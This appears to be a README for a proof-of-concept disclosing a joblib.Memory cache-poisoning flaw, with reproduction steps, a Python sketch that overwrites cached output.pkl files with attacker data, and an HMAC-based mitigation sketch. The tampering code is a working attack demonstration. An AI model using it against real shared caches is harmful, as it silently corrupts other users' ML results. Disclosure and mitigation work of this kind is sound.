Joblib Cache Poisoning Proof-of-Concept

Overview

This repository demonstrates a security vulnerability in joblib.Memory: cached ML artifacts are loaded without integrity verification, so a modified cache file is accepted silently.

The issue allows an attacker with write access to a shared cache directory to tamper with serialized .pkl artifacts, resulting in corrupted outputs during model execution.

Vulnerability Summary

Type: ML Cache Integrity Bypass / Deserialization Trust Issue
Library: joblib (Memory caching system)
Impact: Silent corruption of ML pipeline outputs
Root Cause: No integrity validation on cached pickle artifacts

Attack Scenario

In shared or multi-tenant environments:

1. joblib caches function outputs as .pkl files.
2. The cache files are stored at deterministic filesystem paths.
3. The attacker modifies the cached artifacts directly.
4. The victim re-executes the function and receives the corrupted output.
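
The four steps above can be sketched in a single process. This is a minimal illustration, not the contents of poc/victim.py or poc/attacker.py: the function name `extract_features`, the temporary directory standing in for the shared cache, and the use of a plain list instead of a NumPy array are all assumptions made to keep the example self-contained. It assumes joblib is installed and that cached results are stored in files named `output.pkl` under the cache location.

```python
import glob
import os
import tempfile

import joblib
from joblib import Memory

# Assumption: a temporary directory stands in for the shared cache directory.
cache_dir = tempfile.mkdtemp(prefix="shared_cache_")
memory = Memory(cache_dir, verbose=0)


@memory.cache
def extract_features(x):
    # Hypothetical victim function; the real pipeline is in poc/victim.py.
    return [float(v) for v in x]


# Victim, first run: the result is computed and written to the cache.
first = extract_features([1, 2, 3])

# Attacker: locate the cached result files and overwrite them in place.
# Only write access to the cache directory is needed.
targets = glob.glob(os.path.join(cache_dir, "**", "output.pkl"), recursive=True)
for path in targets:
    joblib.dump(["CORRUPTED_FEATURE_VECTOR", [999, 999, 999]], path)

# Victim, second run: same arguments, so the result is read from the cache.
second = extract_features([1, 2, 3])

print("first call: ", first)
print("second call:", second)
```

If the cache behaves as described in this README, the second call returns the attacker's object and no exception or warning is raised.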

Repository Structure


joblib-cache-poc/
│
├── poc/
│   ├── victim.py        # normal ML pipeline using joblib.Memory
│   └── attacker.py      # cache poisoning script
│
├── shared_cache/        # generated cache directory (optional)
│
├── Report.md            # full vulnerability analysis
└── README.md

Reproduction Steps

1. Run victim pipeline

python poc/victim.py

Expected output:

[1. 2. 3.]

2. Run attacker cache poisoning

python poc/attacker.py

This modifies the cached .pkl artifact in the shared cache directory.

3. Re-run victim pipeline

python poc/victim.py

Observed output:

['CORRUPTED_FEATURE_VECTOR', [999, 999, 999]]

Security Impact

Silent corruption of ML outputs
Cross-process cache contamination
Broken trust boundary between filesystem and ML execution
No runtime error or warning generated

Affected Component

joblib.Memory
joblib.numpy_pickle._unpickle
joblib._store_backends.StoreBackendMixin.load_item
Python pickle deserialization layer

Mitigation

Add cryptographic integrity checks (HMAC/signatures) for cache artifacts
Isolate cache per user/process
Avoid shared writable cache directories
Replace raw pickle usage in shared environments
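
The first mitigation can be sketched with the standard library alone. This is an illustration of the idea rather than a patch to joblib: the helpers `dump_signed` and `load_verified` are hypothetical names, the file layout (HMAC tag followed by the pickle payload) is an assumption, and the secret key is assumed to be stored somewhere the attacker cannot read, outside the shared cache directory.

```python
import hashlib
import hmac
import os
import pickle
import tempfile

TAG_SIZE = hashlib.sha256().digest_size  # 32 bytes for HMAC-SHA256


def dump_signed(obj, path, key):
    """Write an HMAC-SHA256 tag followed by the pickled object (hypothetical helper)."""
    payload = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    with open(path, "wb") as f:
        f.write(tag + payload)


def load_verified(path, key):
    """Verify the tag before unpickling; raise ValueError on mismatch."""
    with open(path, "rb") as f:
        blob = f.read()
    tag, payload = blob[:TAG_SIZE], blob[TAG_SIZE:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError(f"integrity check failed for {path}")
    # Only reached when the payload is byte-for-byte what was signed.
    return pickle.loads(payload)


# Assumption: the key lives outside the shared cache and is unknown to the attacker.
key = os.urandom(32)
path = os.path.join(tempfile.mkdtemp(), "output.pkl")

dump_signed([1.0, 2.0, 3.0], path, key)
restored = load_verified(path, key)

# An attacker without the key overwrites the file with a plain pickle.
with open(path, "wb") as f:
    pickle.dump(["CORRUPTED_FEATURE_VECTOR", [999, 999, 999]], f)

try:
    load_verified(path, key)
    tamper_detected = False
except ValueError:
    tamper_detected = True

print("restored:", restored)
print("tamper detected:", tamper_detected)
```

Verifying the tag before calling `pickle.loads` matters: the tampered bytes are rejected without ever being deserialized, so the failure is loud instead of silent.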

Author

Nguyen Duc Canh (canhnguyen26)
